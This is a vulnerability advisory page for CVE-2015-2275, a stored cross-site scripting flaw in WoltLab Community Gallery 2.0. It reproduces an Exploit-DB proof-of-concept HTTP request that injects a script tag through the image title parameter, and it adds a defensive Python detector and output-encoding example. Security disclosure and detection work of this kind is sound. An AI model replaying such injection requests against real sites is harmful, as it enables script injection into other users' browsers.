CVE-2015-2275
Description
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WoltLab Community Gallery - Persistent Cross-Site Scripting
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the vulnerability details to vendor
+ 03/11/2015: Public information
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275
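Added example for defenders (not part of the advisory and not WoltLab code): a check that parses an AJAXProxy form body, flags a saveImageData request whose parameters[data][N][title] value carries HTML markup, and shows the output encoding that neutralises a stored title at render time. The function names, the markup heuristic and the sample bodies are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Key shape taken from the advisory: parameters[data][<imageID>][title]
TITLE_KEY = re.compile(r"^parameters\[data\]\[(\d+)\]\[title\]$")
# Heuristic (assumption): a "<" that starts a tag, closing tag or comment
MARKUP = re.compile(r"<\s*[a-zA-Z/!]")

def flag_title_markup(body):
    """Return [(image_id, decoded_title)] for saveImageData titles carrying markup."""
    fields = parse_qsl(body, keep_blank_values=True)  # also percent-decodes keys
    if ("actionName", "saveImageData") not in fields:
        return []
    hits = []
    for key, value in fields:
        match = TITLE_KEY.match(key)
        if match and MARKUP.search(value):
            hits.append((int(match.group(1)), value))
    return hits

def render_title(title):
    """Output-encode a stored title for an HTML context (the general CWE-79 remedy)."""
    return html.escape(title, quote=True)

# Constructed sample bodies, shortened from the request shape shown in the advisory.
PREFIX = ("actionName=saveImageData"
          "&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7"
          "&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test"
          "&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=")
SAMPLE_FLAGGED = PREFIX + "%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5BisEdit%5D=1"
SAMPLE_CLEAN = PREFIX + "Hoa+Mai+%3C+2015&parameters%5BisEdit%5D=1"

if __name__ == "__main__":
    for name, body in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        for image_id, title in flag_title_markup(body):
            print(name, image_id, repr(title), "->", render_title(title))
```

The request-side check is a detection aid for logs or a proxy; titles already stored still need encoding wherever they are rendered.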
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| woltlab | community_gallery | 2.0 | |
References
- http://packetstormsecurity.com/files/130766/Community-Gallery-2.0-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2015/Mar/65
- http://www.exploit-db.com/exploits/36368
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- http://www.osvdb.org/119455
- http://www.securityfocus.com/archive/1/534841/100/0/threaded
- http://www.securityfocus.com/bid/73053
CWEs
CWE-79